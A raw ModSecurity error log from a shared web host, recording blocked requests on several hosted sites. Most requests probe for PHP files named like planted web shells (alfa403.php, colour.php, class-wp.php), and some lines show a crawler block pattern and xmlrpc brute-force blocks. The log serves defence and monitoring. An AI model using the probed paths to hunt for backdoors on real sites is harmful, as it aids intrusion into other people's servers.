[Tue May 26 16:51:55.227804 2026] [security2:error] [pid 823496:tid 823753] [client 114.119.141.79:48009] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/shop-2/"] [unique_id "ahWCU5a08mrtyBNpA4PmVAAAAH0"], referer: http://www.traderscafe.in/shop-2/?filter_cat=78%2C109%2C115%2C80%2C65&stock_status=instock&on_sale=onsale
[Tue May 26 16:51:55.323885 2026] [security2:error] [pid 823496:tid 823732] [client 20.151.130.61:65217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWCU5a08mrtyBNpA4PmVQAAAGg"]
[Tue May 26 16:51:55.324009 2026] [security2:error] [pid 823496:tid 823732] [client 20.151.130.61:65217] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWCU5a08mrtyBNpA4PmVQAAAGg"]
[Tue May 26 16:51:55.405527 2026] [security2:error] [pid 823496:tid 823702] [client 20.206.111.203:6119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/4PJcpMFsD8B.php"] [unique_id "ahWCU5a08mrtyBNpA4PmWAAAAEo"]
[Tue May 26 16:51:55.405640 2026] [security2:error] [pid 823496:tid 823702] [client 20.206.111.203:6119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/4PJcpMFsD8B.php"] [unique_id "ahWCU5a08mrtyBNpA4PmWAAAAEo"]
[Tue May 26 16:51:55.733174 2026] [security2:error] [pid 823496:tid 823683] [client 20.151.130.61:65220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWCU5a08mrtyBNpA4PmWgAAADc"]
[Tue May 26 16:51:55.733288 2026] [security2:error] [pid 823496:tid 823683] [client 20.151.130.61:65220] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWCU5a08mrtyBNpA4PmWgAAADc"]
[Tue May 26 16:51:55.798912 2026] [security2:error] [pid 823496:tid 823742] [client 20.206.111.203:6082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWCU5a08mrtyBNpA4PmWwAAAHI"]
[Tue May 26 16:51:55.799018 2026] [security2:error] [pid 823496:tid 823742] [client 20.206.111.203:6082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWCU5a08mrtyBNpA4PmWwAAAHI"]
[Tue May 26 16:51:55.916133 2026] [security2:error] [pid 823496:tid 823691] [client 20.151.130.61:65262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWCU5a08mrtyBNpA4PmXgAAAD8"]
[Tue May 26 16:51:55.916280 2026] [security2:error] [pid 823496:tid 823691] [client 20.151.130.61:65262] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWCU5a08mrtyBNpA4PmXgAAAD8"]
[Tue May 26 16:51:55.946595 2026] [security2:error] [pid 823496:tid 823711] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCUpa08mrtyBNpA4PmSAAAAFM"]
[Tue May 26 16:51:56.067408 2026] [security2:error] [pid 823496:tid 823722] [client 20.151.130.61:65249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWCVJa08mrtyBNpA4PmYQAAAF4"]
[Tue May 26 16:51:56.067554 2026] [security2:error] [pid 823496:tid 823722] [client 20.151.130.61:65249] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWCVJa08mrtyBNpA4PmYQAAAF4"]
[Tue May 26 16:51:56.238233 2026] [security2:error] [pid 823496:tid 823755] [client 20.206.111.203:6024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cfile.php"] [unique_id "ahWCVJa08mrtyBNpA4PmZAAAAH8"]
[Tue May 26 16:51:56.238330 2026] [security2:error] [pid 823496:tid 823755] [client 20.206.111.203:6024] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cfile.php"] [unique_id "ahWCVJa08mrtyBNpA4PmZAAAAH8"]
[Tue May 26 16:51:56.406308 2026] [security2:error] [pid 823496:tid 823741] [client 20.151.130.61:64521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWCVJa08mrtyBNpA4PmZwAAAHE"]
[Tue May 26 16:51:56.406450 2026] [security2:error] [pid 823496:tid 823741] [client 20.151.130.61:64521] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWCVJa08mrtyBNpA4PmZwAAAHE"]
[Tue May 26 16:51:56.608593 2026] [security2:error] [pid 823496:tid 823686] [client 20.151.130.61:65314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWCVJa08mrtyBNpA4PmagAAADo"]
[Tue May 26 16:51:56.608732 2026] [security2:error] [pid 823496:tid 823686] [client 20.151.130.61:65314] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWCVJa08mrtyBNpA4PmagAAADo"]
[Tue May 26 16:51:56.646433 2026] [security2:error] [pid 823496:tid 823676] [client 20.206.111.203:6015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/class-wp.php"] [unique_id "ahWCVJa08mrtyBNpA4PmbAAAADA"]
[Tue May 26 16:51:56.646520 2026] [security2:error] [pid 823496:tid 823676] [client 20.206.111.203:6015] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/class-wp.php"] [unique_id "ahWCVJa08mrtyBNpA4PmbAAAADA"]
[Tue May 26 16:51:57.016841 2026] [security2:error] [pid 823496:tid 823642] [client 20.206.111.203:6134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ahax.php"] [unique_id "ahWCVZa08mrtyBNpA4PmcgAAAA4"]
[Tue May 26 16:51:57.016962 2026] [security2:error] [pid 823496:tid 823642] [client 20.206.111.203:6134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ahax.php"] [unique_id "ahWCVZa08mrtyBNpA4PmcgAAAA4"]
[Tue May 26 16:51:57.156591 2026] [security2:error] [pid 823496:tid 823659] [client 20.151.130.61:64548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWCVZa08mrtyBNpA4PmcwAAAB8"]
[Tue May 26 16:51:57.156727 2026] [security2:error] [pid 823496:tid 823659] [client 20.151.130.61:64548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWCVZa08mrtyBNpA4PmcwAAAB8"]
[Tue May 26 16:51:57.340521 2026] [security2:error] [pid 817651:tid 817808] [client 20.151.130.61:64451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWCVdlGRCPPN1dS2y3DaQAAAKA"]
[Tue May 26 16:51:57.382333 2026] [security2:error] [pid 823496:tid 823706] [client 20.63.34.22:12169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/ff.php"] [unique_id "ahWCVZa08mrtyBNpA4PmeAAAAE4"]
[Tue May 26 16:51:57.382421 2026] [security2:error] [pid 823496:tid 823706] [client 20.63.34.22:12169] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/ff.php"] [unique_id "ahWCVZa08mrtyBNpA4PmeAAAAE4"]
[Tue May 26 16:51:57.454290 2026] [security2:error] [pid 823496:tid 823685] [client 20.206.111.203:6109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/aa2.php"] [unique_id "ahWCVZa08mrtyBNpA4PmfQAAADk"]
[Tue May 26 16:51:57.454384 2026] [security2:error] [pid 823496:tid 823685] [client 20.206.111.203:6109] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/aa2.php"] [unique_id "ahWCVZa08mrtyBNpA4PmfQAAADk"]
[Tue May 26 16:51:57.481108 2026] [security2:error] [pid 817651:tid 817832] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCVNlGRCPPN1dS2y3DYQAAALg"]
[Tue May 26 16:51:57.570017 2026] [security2:error] [pid 817651:tid 817821] [client 117.198.37.168:56729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCVdlGRCPPN1dS2y3DagAAAK0"]
[Tue May 26 16:51:57.570191 2026] [security2:error] [pid 817651:tid 817821] [client 117.198.37.168:56729] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCVdlGRCPPN1dS2y3DagAAAK0"]
[Tue May 26 16:51:57.840853 2026] [security2:error] [pid 823496:tid 823660] [client 20.206.111.203:6048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahWCVZa08mrtyBNpA4PmfwAAACA"]
[Tue May 26 16:51:57.840961 2026] [security2:error] [pid 823496:tid 823660] [client 20.206.111.203:6048] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahWCVZa08mrtyBNpA4PmfwAAACA"]
[Tue May 26 16:51:57.911438 2026] [security2:error] [pid 823496:tid 823636] [client 20.151.130.61:65340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCVZa08mrtyBNpA4PmggAAAAg"]
[Tue May 26 16:51:58.052020 2026] [security2:error] [pid 817651:tid 817887] [client 20.151.130.61:64451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahWCVtlGRCPPN1dS2y3DdQAAAO8"]
[Tue May 26 16:51:58.127618 2026] [security2:error] [pid 823496:tid 823640] [client 20.151.130.61:65340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCVpa08mrtyBNpA4PmhQAAAAw"]
[Tue May 26 16:51:58.282475 2026] [security2:error] [pid 823496:tid 823702] [client 20.206.111.203:5962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/login8.php"] [unique_id "ahWCVpa08mrtyBNpA4PmjAAAAEo"]
[Tue May 26 16:51:58.282573 2026] [security2:error] [pid 823496:tid 823702] [client 20.206.111.203:5962] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/login8.php"] [unique_id "ahWCVpa08mrtyBNpA4PmjAAAAEo"]
[Tue May 26 16:51:58.407681 2026] [security2:error] [pid 823496:tid 823729] [client 20.63.34.22:12227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/x.php"] [unique_id "ahWCVpa08mrtyBNpA4PmjQAAAGU"]
[Tue May 26 16:51:58.407779 2026] [security2:error] [pid 823496:tid 823729] [client 20.63.34.22:12227] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/x.php"] [unique_id "ahWCVpa08mrtyBNpA4PmjQAAAGU"]
[Tue May 26 16:51:58.422771 2026] [security2:error] [pid 817651:tid 817791] [client 20.151.130.61:64451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWCVtlGRCPPN1dS2y3DdgAAAI8"]
[Tue May 26 16:51:58.422852 2026] [security2:error] [pid 817651:tid 817791] [client 20.151.130.61:64451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWCVtlGRCPPN1dS2y3DdgAAAI8"]
[Tue May 26 16:51:58.654004 2026] [security2:error] [pid 817651:tid 817814] [client 20.206.111.203:5955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/nx.php"] [unique_id "ahWCVtlGRCPPN1dS2y3DfgAAAKY"]
[Tue May 26 16:51:58.654093 2026] [security2:error] [pid 817651:tid 817814] [client 20.206.111.203:5955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/nx.php"] [unique_id "ahWCVtlGRCPPN1dS2y3DfgAAAKY"]
[Tue May 26 16:51:58.675099 2026] [security2:error] [pid 823496:tid 823683] [client 20.151.130.61:64449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWCVpa08mrtyBNpA4PmkgAAADc"]
[Tue May 26 16:51:58.675192 2026] [security2:error] [pid 823496:tid 823683] [client 20.151.130.61:64449] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWCVpa08mrtyBNpA4PmkgAAADc"]
[Tue May 26 16:51:59.063582 2026] [security2:error] [pid 823496:tid 823668] [client 20.206.111.203:5961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahWCV5a08mrtyBNpA4PmnAAAACg"]
[Tue May 26 16:51:59.063712 2026] [security2:error] [pid 823496:tid 823668] [client 20.206.111.203:5961] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahWCV5a08mrtyBNpA4PmnAAAACg"]
[Tue May 26 16:51:59.069294 2026] [security2:error] [pid 823496:tid 823667] [client 20.151.130.61:65330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWCV5a08mrtyBNpA4PmnQAAACc"]
[Tue May 26 16:51:59.069390 2026] [security2:error] [pid 823496:tid 823667] [client 20.151.130.61:65330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWCV5a08mrtyBNpA4PmnQAAACc"]
[Tue May 26 16:51:59.358867 2026] [security2:error] [pid 823496:tid 823690] [client 20.151.130.61:65285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWCV5a08mrtyBNpA4PmoQAAAD4"]
[Tue May 26 16:51:59.358989 2026] [security2:error] [pid 823496:tid 823690] [client 20.151.130.61:65285] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWCV5a08mrtyBNpA4PmoQAAAD4"]
[Tue May 26 16:51:59.524934 2026] [security2:error] [pid 823496:tid 823695] [client 20.151.130.61:64528] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWCV5a08mrtyBNpA4PmpQAAAEM"]
[Tue May 26 16:51:59.555243 2026] [security2:error] [pid 823496:tid 823751] [client 20.206.111.203:6004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xamp.php"] [unique_id "ahWCV5a08mrtyBNpA4PmpgAAAHs"]
[Tue May 26 16:51:59.555347 2026] [security2:error] [pid 823496:tid 823751] [client 20.206.111.203:6004] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xamp.php"] [unique_id "ahWCV5a08mrtyBNpA4PmpgAAAHs"]
[Tue May 26 16:51:59.601079 2026] [security2:error] [pid 823496:tid 823716] [client 20.151.130.61:65340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCV5a08mrtyBNpA4PmpwAAAFg"]
[Tue May 26 16:51:59.681849 2026] [security2:error] [pid 823496:tid 823652] [client 20.151.130.61:64528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWCV5a08mrtyBNpA4PmqAAAABg"]
[Tue May 26 16:51:59.681993 2026] [security2:error] [pid 823496:tid 823652] [client 20.151.130.61:64528] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWCV5a08mrtyBNpA4PmqAAAABg"]
